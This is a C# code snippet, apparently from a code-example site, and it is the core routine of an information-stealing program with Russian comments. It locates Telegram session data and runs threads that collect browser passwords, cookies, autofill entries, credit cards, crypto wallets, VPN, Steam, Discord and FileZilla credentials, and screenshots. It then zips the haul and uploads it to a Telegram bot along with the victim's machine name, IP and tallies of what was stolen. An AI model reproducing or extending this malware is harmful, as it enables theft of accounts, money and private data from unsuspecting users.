Exemplo n.º 1
0
        // Get tdata directory
        private static string GetTdata()
        {
            string TelegramDesktopPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Telegram Desktop\\tdata";

            Process[] TelegramProcesses = Process.GetProcessesByName("Telegram");

            if (TelegramProcesses.Length == 0)
            {
                return(TelegramDesktopPath);
            }
            else
            {
                return(Path.Combine(
                           Path.GetDirectoryName(
                               ProcessList.ProcessExecutablePath(
                                   TelegramProcesses[0])), "tdata"));
            }
        }
        public static void Start()  // Метод вызова функций
        {
            try
            {
                Directory.CreateDirectory(Help.StealerDir);
                List <Thread> Threads = new List <Thread>();

                Threads.Add(new Thread(() => Report.CreateReport())); // Старт потока с браузерами

                Threads.Add(new Thread(() => Files.GetFiles()));      // Старт потока с грабом файла

                Threads.Add(new Thread(() => StartWallets.Start()));  // Старт потока c кошелями

                Threads.Add(new Thread(() =>
                {
                    Help.Ethernet();              // Получение информации о айпи
                    Screen.GetScreen();           // Скриншот экрана
                    ProcessList.WriteProcesses(); // Получение списка процессов
                    SystemInfo.GetSystem();       // Скриншот экрана
                }));

                Threads.Add(new Thread(() =>
                {
                    ProtonVPN.Save();
                    OpenVPN.Save();
                    NordVPN.Save();
                    Steam.SteamGet();
                }));

                Threads.Add(new Thread(() =>
                {
                    Discord.WriteDiscord();
                    FileZilla.GetFileZilla();
                    Telegram.GetTelegramSessions();
                    Vime.Get();
                }));

                foreach (Thread t in Threads)
                {
                    t.Start();
                }
                foreach (Thread t in Threads)
                {
                    t.Join();
                }

                // Пакуем в апхив с паролем
                string zipArchive = Help.StealerDir + "\\" + SystemInfo.CountryCode() + SystemInfo.IP() + "(" + Help.dateLog + ")" + ".zip";
                using (Ionic.Zip.ZipFile zip = new Ionic.Zip.ZipFile(Encoding.GetEncoding("cp866"))) // Устанавливаем кодировку
                {
                    zip.ParallelDeflateThreshold = -1;
                    zip.UseZip64WhenSaving       = Ionic.Zip.Zip64Option.Always;
                    zip.CompressionLevel         = Ionic.Zlib.CompressionLevel.Default; // Задаем степень сжатия
                    zip.AddDirectory(Help.StealerDir);                                  // Кладем в архив содержимое папки с логом
                    zip.Save(zipArchive);                                               // Сохраняем архив
                }
                string byteArchive = Path.GetFileName(zipArchive);
                byte[] file        = File.ReadAllBytes(zipArchive);
                string url         = string.Concat(new string[]
                {
                    Help.ApiUrl,
                    Config.Token,
                    "/sendDocument?chat_id=",
                    Config.ID,
                    "&caption=" +
                    "\n👤 " + Environment.MachineName + "/" + Environment.UserName +
                    "\n🏴 IP: " + SystemInfo.IP() + SystemInfo.Country() +
                    "\n BASIC INFORMATION:" +
                    "\n   ∟ Passwords - " + Counting.Passwords +
                    "\n   ∟ Cookies - " + Counting.Cookies +
                    "\n   ∟ History - " + Counting.History +
                    "\n   ∟ AutoFills - " + Counting.AutoFill +
                    "\n   ∟ Cards - " + Counting.CreditCards +
                    "\n   ∟ Grabbed Files - " + Counting.FileGrabber +
                    "\n OTHER SOFTWARE:" +
                    (Counting.Discord > 0 ? "\n   ✅  Discord" : "") +
                    (Counting.Wallets > 0 ? "\n   ✅  Wallets" : "") +
                    (Counting.Telegram > 0 ? "\n   ✅  Telegram" : "") +
                    (Counting.FileZilla > 0 ? "\n   ✅  FileZilla" + " (" + Counting.FileZilla + ")" : "") +
                    (Counting.Steam > 0 ? "\n   ✅  Steam" : "") +
                    (Counting.NordVPN > 0 ? "\n   ✅  NordVPN" : "") +
                    (Counting.OpenVPN > 0 ? "\n   ✅  OpenVPN" : "") +
                    (Counting.ProtonVPN > 0 ? "\n   ✅  ProtonVPN" : "") +
                    (Counting.VimeWorld > 0 ? "\n   ✅  VimeWorld" + (Config.MinecraftModule == true ? $":\n     ∟ {Vime.Level()} {Vime.Donate()} {Vime.NickName()}" : ""):"") +
                    "\n⚙️ " + SystemInfo.GetSystemVersion() +
                    "\n - " + URLSearcher.GetDomainDetect(Help.StealerDir + "\\Browsers\\")
                });
                if (Config.Developer)
                {
                    if (File.Exists(Help.AppDate + "\\Developer"))
                    {
                        MessageBox.Show("ВЫРУБИ РЕЖИМ РАЗРАБОТЧИКА И ПЕРЕКРЕСТИСЬ");
                        Application.Exit();
                        Environment.Exit(0);
                    }
                }
                Sending.POST(file, byteArchive, "application/x-ms-dos-executable", url);
            }
            catch (Exception e)
            {
                Console.WriteLine(e + "Чё то в коллектион");
            }
        }